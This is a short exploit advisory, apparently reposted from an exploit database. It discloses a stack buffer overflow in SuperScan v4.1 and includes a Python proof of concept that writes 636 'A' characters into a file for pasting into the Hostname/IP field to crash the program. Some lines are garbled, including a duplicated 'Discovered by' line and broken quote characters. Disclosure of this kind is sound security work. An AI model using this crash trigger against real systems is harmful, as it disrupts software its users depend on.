Exploit Title: SuperScan v4.1 - Stack Buffer Overflow (PoC)
Discovered by: Exploit Title: SuperScan v4.1 - Stack Buffer Overflow (PoC)
Discovered by: Ahmet ?mit BAYRAM
Discovered Date: 18.09.2023
Vendor: Foundstone Inc
Software Link: https://delivery2.filecroco.com/kits_6/superscan-4.1.zip
Tested Version: v4.1 (latest)
Tested on: Windows 2019 Server 64bit
Steps to Reproduce
Open the SuperScan application.
Paste the content of poc.txt into the Hostname / IP box.
Click the arrow button next to the box.
The application crashes due to a buffer overflow.
Proof of Concept (PoC)
The following Python script generates a poc.txt file containing the
payload. When loaded into the Hostname / IP field, it triggers a buffer
overflow and crashes the application.
#!/usr/bin/python
poc = ?A? * 636
try:
with open("poc.txt", "w") as file:
file.write(poc)
print("POC is created")
except Exception as e:
print("POC is not created:", e)
SuperScan 4.1 Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 318
